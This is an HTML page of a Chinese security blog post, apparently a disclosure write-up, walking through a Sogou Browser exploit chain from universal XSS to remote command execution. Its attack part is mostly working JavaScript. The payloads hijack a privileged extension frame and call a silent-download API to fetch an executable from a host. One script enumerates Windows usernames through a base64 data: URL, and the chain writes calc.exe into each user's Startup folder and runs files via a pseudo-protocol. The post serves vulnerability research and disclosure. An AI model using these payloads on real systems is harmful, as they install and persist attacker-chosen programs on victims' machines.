<!doctype html>




<html class="theme-next muse">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="安全,XSS,浏览器安全," />





  <link rel="alternate" href="/atom.xml" title="zhchbin" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="案例链接：http://www.wooyun.org/bugs/wooyun-2016-0213422 免责声明本博客提供的部分文章思路可能带有攻击性，仅供安全研究与教学之用，风险自负! 0x00 首先是UXSS具体见：https://bugs.chromium.org/p/chromium/issues/detail?id=569496 浏览器版本号：6.3.8.21279 0x01 既然可以U">
<meta name="keywords" content="安全,XSS,浏览器安全">
<meta property="og:type" content="article">
<meta property="og:title" content="[浏览器安全系列三] 搜狗浏览器从UXSS到远程命令执行">
<meta property="og:url" content="http://zhchbin.github.io/2016/10/06/Sogou-Browser-RCE/index.html">
<meta property="og:site_name" content="zhchbin">
<meta property="og:description" content="案例链接：http://www.wooyun.org/bugs/wooyun-2016-0213422 免责声明本博客提供的部分文章思路可能带有攻击性，仅供安全研究与教学之用，风险自负! 0x00 首先是UXSS具体见：https://bugs.chromium.org/p/chromium/issues/detail?id=569496 浏览器版本号：6.3.8.21279 0x01 既然可以U">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/7184df6bgw1f8idldd42oj20hs0cstb1.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/7184df6bgw1f8idmtvo71j20ry0j0gou.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/7184df6bgw1f8idowi21sj20n90h5465.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/7184df6bgw1f8idw8oogbj20ru0ivgqz.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/7184df6bgw1f8idxtyw70g20sg0j2do4.gif">
<meta property="og:updated_time" content="2016-10-06T05:19:28.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[浏览器安全系列三] 搜狗浏览器从UXSS到远程命令执行">
<meta name="twitter:description" content="案例链接：http://www.wooyun.org/bugs/wooyun-2016-0213422 免责声明本博客提供的部分文章思路可能带有攻击性，仅供安全研究与教学之用，风险自负! 0x00 首先是UXSS具体见：https://bugs.chromium.org/p/chromium/issues/detail?id=569496 浏览器版本号：6.3.8.21279 0x01 既然可以U">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/7184df6bgw1f8idldd42oj20hs0cstb1.jpg">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: false,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://zhchbin.github.io/2016/10/06/Sogou-Browser-RCE/"/>

  <title> [浏览器安全系列三] 搜狗浏览器从UXSS到远程命令执行 | zhchbin </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?7c9353bfaa5510a38b4349ec413d2d18";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">zhchbin</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                [浏览器安全系列三] 搜狗浏览器从UXSS到远程命令执行
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-10-06T10:57:48+08:00" content="2016-10-06">
              2016-10-06
            </time>
          </span>

          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/10/06/Sogou-Browser-RCE/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2016/10/06/Sogou-Browser-RCE/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
              &nbsp; | &nbsp;
              <span class="page-pv"><i class="fa fa-file-o"></i>
              <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
              </span>
          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>案例链接：<a href="http://www.wooyun.org/bugs/wooyun-2016-0213422" target="_blank" rel="noopener">http://www.wooyun.org/bugs/wooyun-2016-0213422</a></p>
<h2 id="免责声明"><a href="#免责声明" class="headerlink" title="免责声明"></a>免责声明</h2><p>本博客提供的部分文章思路可能带有攻击性，仅供安全研究与教学之用，风险自负!</p>
<h3 id="0x00-首先是UXSS"><a href="#0x00-首先是UXSS" class="headerlink" title="0x00 首先是UXSS"></a>0x00 首先是UXSS</h3><p>具体见：<a href="https://bugs.chromium.org/p/chromium/issues/detail?id=569496" target="_blank" rel="noopener">https://bugs.chromium.org/p/chromium/issues/detail?id=569496</a></p>
<p>浏览器版本号：6.3.8.21279</p>
<h3 id="0x01-既然可以UXSS，我们找个特权域"><a href="#0x01-既然可以UXSS，我们找个特权域" class="headerlink" title="0x01 既然可以UXSS，我们找个特权域"></a>0x01 既然可以UXSS，我们找个特权域</h3><p>从漏洞 <a href="http://wooyun.org/bugs/wooyun-2010-0145023" target="_blank" rel="noopener">http://wooyun.org/bugs/wooyun-2010-0145023</a> 我们可以知道搜狗浏览器的扩展有下载任意文件到任意位置的API！我们自己写一个恶意扩展，提交并通过审核的可能性基本为0。这个API这么好用，但又只能从：se-extension://域名下进行调用，好像很难构造吧。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sogouExplorer.downloads.downloadSilently(&#123;</span><br><span class="line">  url:<span class="string">"http://tmxk.org/img/r-c.png"</span>,</span><br><span class="line">  filename:<span class="string">"dd.exe"</span>,</span><br><span class="line">  path:<span class="string">"d:\",</span></span><br><span class="line"><span class="string">  method:"</span>GET<span class="string">"</span></span><br><span class="line"><span class="string">&#125;)</span></span><br></pre></td></tr></table></figure>
<p>我在想怎么利用上面的UXSS的时候，突发奇想的测试了一下，我们能不能打到se-extension://这个域名，于是进行一下测试。我找了一个搜狗浏览器安装时启用的默认扩展，找到其background.html的地址：<code>se-extension://ext238561744/background.html</code>。结果当然是没有那么容易，会提示如下的信息：</p>
<blockquote>
<p>Denying load of se-extension://ext238561744/background.html. Resources must be listed in the web_accessible_resources manifest key in order to be loaded by pages outside the extension.</p>
</blockquote>
<p><img src="http://ww1.sinaimg.cn/large/7184df6bgw1f8idldd42oj20hs0cstb1.jpg" alt=""></p>
<p><img src="http://ww1.sinaimg.cn/large/7184df6bgw1f8idmtvo71j20ry0j0gou.jpg" alt=""></p>
<h3 id="0x02-难道没法子？"><a href="#0x02-难道没法子？" class="headerlink" title="0x02 难道没法子？"></a>0x02 难道没法子？</h3><p>我认真的读了两秒这个提示后，原来还允许开发者通过<code>web_accessible_resources</code>指定某些资源，从而实现在扩展外被访问！当然，我们就去试试运气去默认的扩展下找找看有没有吧。搜狗浏览器安装的插件在这个目录下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Username\AppData\Roaming\SogouExplorer\Extension</span><br></pre></td></tr></table></figure>
<p>grep一下，找到了一个插件，搜狗打假助手，<code>com.sogou.antiCrime</code>，其manifest.xml文件中有以下的内容：</p>
<p><img src="http://ww1.sinaimg.cn/large/7184df6bgw1f8idowi21sj20n90h5465.jpg" alt="">)</p>
<p>于是就把要打的域名地址换成了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">se-extension://ext238561744/jd/images/ac-logo.png</span><br></pre></td></tr></table></figure>
<p>一开始我还觉得这是一个PNG图片，即使没有被拒绝访问，也应该用不了扩展的API吧。我本来是很怀疑能不能行的，正想放弃的时候，我还是觉得应该尝试一发。把PoC里的expolit.html里的f函数改一下，尝试下载一个文件到<code>c:\Users\</code>目录下。</p>
<p>备注：后来想想其实也对，因为图片在浏览器打开的时候浏览器用自动的使用img标签插入来显示图片。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">f</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="built_in">console</span>.log(<span class="string">"f()"</span>)</span><br><span class="line">  <span class="keyword">if</span> (++c1 == <span class="number">2</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> x1 = x.contentWindow[<span class="number">0</span>].frameElement.nextSibling;</span><br><span class="line">    <span class="comment">// x1.src = 'se-extension://ext238561744/background.html';         // Denied</span></span><br><span class="line">    x1.src = <span class="string">'se-extension://ext238561744/jd/images/ac-logo.png'</span>;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      <span class="keyword">while</span> (x1.contentDocument) &#123; ml(); &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">      x1.src = <span class="string">"javascript:if(location != 'about:blank') &#123;console.log(location); sogouExplorer.downloads.downloadSilently(&#123;url:'http://127.0.0.1/test.js',filename:'test.js',path:'c:\\\\Users\\\\',method:'GET'&#125;);&#125;"</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p><img src="http://ww1.sinaimg.cn/large/7184df6bgw1f8idw8oogbj20ru0ivgqz.jpg" alt=""></p>
<h3 id="0x03-最终我们做到了！"><a href="#0x03-最终我们做到了！" class="headerlink" title="0x03 最终我们做到了！"></a>0x03 最终我们做到了！</h3><p>上面下载好文件之后，我们可以直接使用伪协议来执行，在 <a href="http://wooyun.org/bugs/wooyun-2010-0177221" target="_blank" rel="noopener">http://wooyun.org/bugs/wooyun-2010-0177221</a> 最新版依旧没有加个提示什么的。而且现在我们又扩展名<code>.js</code>了。直接可以执行。当然，我们也可以写到用户的启动目录中，至于怎么拿到用户名，这个 <a href="http://wooyun.org/bugs/wooyun-2010-0176436" target="_blank" rel="noopener">http://wooyun.org/bugs/wooyun-2010-0176436</a> 的漏洞都公开了，然后好像什么修复工作都没有做。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">location.href=<span class="string">"vbefile:/../../../../../../Users/test.js"</span></span><br></pre></td></tr></table></figure>
<p>获取用户名的过程：用户访问open.html，跳转到data:域下<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">window</span>.location.href = <span class="string">"data:text/html;base64,PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMjcuMC4wLjEvZXZpbC5qcyc+PC9zY3JpcHQ+"</span></span><br></pre></td></tr></table></figure></p>
<p>其中base64解密后内容为：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">'http://127.0.0.1/evil.js'</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>evil.js在data域下执行，可以获取到用户名列表，然后再跳转到需要写calc.exe到启动目录的页面中，完成写入操作！</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getUsers</span>(<span class="params">data</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> users = data.match(<span class="regexp">/&lt;script&gt;addRow\("([^"]+)"/g</span>) || [];</span><br><span class="line">  <span class="keyword">var</span> currentUser=[];</span><br><span class="line">  <span class="keyword">for</span>(<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; users.length; i++) &#123;</span><br><span class="line">    <span class="keyword">var</span> user = (users[i].match(<span class="regexp">/&lt;script&gt;addRow\("([^"]+)"/</span>) || [<span class="string">""</span>, <span class="string">""</span>])[<span class="number">1</span>];</span><br><span class="line">    <span class="keyword">if</span>([<span class="string">".."</span>, <span class="string">"All Users"</span>, <span class="string">"Default"</span>, <span class="string">"Default User"</span>, <span class="string">"Public"</span>, <span class="string">"UpdatusUser"</span>, <span class="string">"desktop.ini"</span>].indexOf(user) == <span class="number">-1</span>) &#123;</span><br><span class="line">      currentUser.push(user);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">console</span>.log(currentUser);</span><br><span class="line">  <span class="keyword">return</span> currentUser;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">window</span>.external.extension(<span class="string">"getRecommendSidebarExts"</span>, <span class="string">"file:///C:/Users/"</span>, <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> data = <span class="built_in">JSON</span>.parse(<span class="built_in">arguments</span>[<span class="number">0</span>]);</span><br><span class="line">  <span class="keyword">if</span> (data.success != <span class="literal">true</span>)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  location.href = <span class="string">'http://127.0.0.1/exploit.html?users='</span> + getUsers(data.data);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>写文件到启动目录下：<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">f</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="built_in">console</span>.log(<span class="string">"f()"</span>)</span><br><span class="line">  <span class="keyword">if</span> (++c1 == <span class="number">2</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> users = top.location.search.replace(<span class="string">'?users='</span>).split(<span class="string">','</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> x1 = x.contentWindow[<span class="number">0</span>].frameElement.nextSibling;</span><br><span class="line">    <span class="comment">// x1.src = 'se-extension://ext238561744/background.html';         // Denied</span></span><br><span class="line">    x1.src = <span class="string">'se-extension://ext238561744/jd/images/ac-logo.png'</span>;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      <span class="keyword">while</span> (x1.contentDocument) &#123; ml(); &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">      <span class="keyword">var</span> users_str = <span class="string">''</span>;</span><br><span class="line">      <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; users.length; ++i) &#123;</span><br><span class="line">        users_str += (<span class="string">'"'</span> + users[i] + <span class="string">'"'</span>);</span><br><span class="line">        <span class="keyword">if</span> (i != users.length - <span class="number">1</span>)</span><br><span class="line">          users_str += <span class="string">','</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      x1.src = <span class="string">"javascript:if(location != 'about:blank') &#123; var users=["</span> + users_str + <span class="string">"]; for (var i = 0; i &lt; users.length; ++i) sogouExplorer.downloads.downloadSilently(&#123;url:'http://127.0.0.1/calc.exe',filename:'calc.exe',path:'C:\\\\Users\\\\' + users[i] + '\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\',method:'GET'&#125;);&#125;"</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>录个用伪协议执行的GIF</p>
<p><img src="http://ww4.sinaimg.cn/large/7184df6bgw1f8idxtyw70g20sg0j2do4.gif" alt=""></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/安全/" rel="tag">#安全</a>
          
            <a href="/tags/XSS/" rel="tag">#XSS</a>
          
            <a href="/tags/浏览器安全/" rel="tag">#浏览器安全</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/09/10/A-Valuable-XSS/" rel="next" title="[BBP系列一] 人生第一个值钱的XSS漏洞">
                <i class="fa fa-chevron-left"></i> [BBP系列一] 人生第一个值钱的XSS漏洞
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/10/15/YY-Browser-RCE/" rel="prev" title="[浏览器安全系列四] Fancy3D引擎（YY浏览器）远程命令执行">
                [浏览器安全系列四] Fancy3D引擎（YY浏览器）远程命令执行 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.jpeg"
               alt="Chaobin Zhang" />
          <p class="site-author-name" itemprop="name">Chaobin Zhang</p>
          <p class="site-description motion-element" itemprop="description"></p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">20</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/zhchbin" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/zhchbin" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://wooyun.org/whitehats/zhchbin" target="_blank" title="Wooyun">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Wooyun
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#免责声明"><span class="nav-number">1.</span> <span class="nav-text">免责声明</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-首先是UXSS"><span class="nav-number">1.1.</span> <span class="nav-text">0x00 首先是UXSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-既然可以UXSS，我们找个特权域"><span class="nav-number">1.2.</span> <span class="nav-text">0x01 既然可以UXSS，我们找个特权域</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-难道没法子？"><span class="nav-number">1.3.</span> <span class="nav-text">0x02 难道没法子？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-最终我们做到了！"><span class="nav-number">1.4.</span> <span class="nav-text">0x03 最终我们做到了！</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Chaobin Zhang</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>

<div class="busuanzi-count" style="display: inline-block;">
  <style>
    .site_uv,
    .site_pv,
    .page_pv {
      display: inline-block;
      margin-left: 10px;
    }
    .site_pv::before, .site_uv::before {
      content: "|";
      padding-right: 10px;
    }
  </style>
  <span class="site_pv">
    <i class="fa fa-eye"></i> -
    <span id="busuanzi_value_site_pv"><i class="fa fa-spinner"></i></span>
  </span>

  <span class="site_uv">
    <i class="fa fa-user"></i> -
    <span id="busuanzi_value_site_uv"><i class="fa fa-spinner"></i></span>
  </span>

  <script async="" src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>

        

<div class="busuanzi-count">

  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
  
</div>



        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  

    <script type="text/javascript">
      var disqus_shortname = 'zhchbin';
      var disqus_identifier = '2016/10/06/Sogou-Browser-RCE/';
      var disqus_title = "[浏览器安全系列三] 搜狗浏览器从UXSS到远程命令执行";
      var disqus_url = 'http://zhchbin.github.io/2016/10/06/Sogou-Browser-RCE/';

      function run_disqus_script(disqus_script){
        var dsq = document.createElement('script');
        dsq.type = 'text/javascript';
        dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/' + disqus_script;
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
      }

      run_disqus_script('count.js');
      
        run_disqus_script('embed.js');
      
    </script>
  




  
  

  

  

  

</body>
</html>
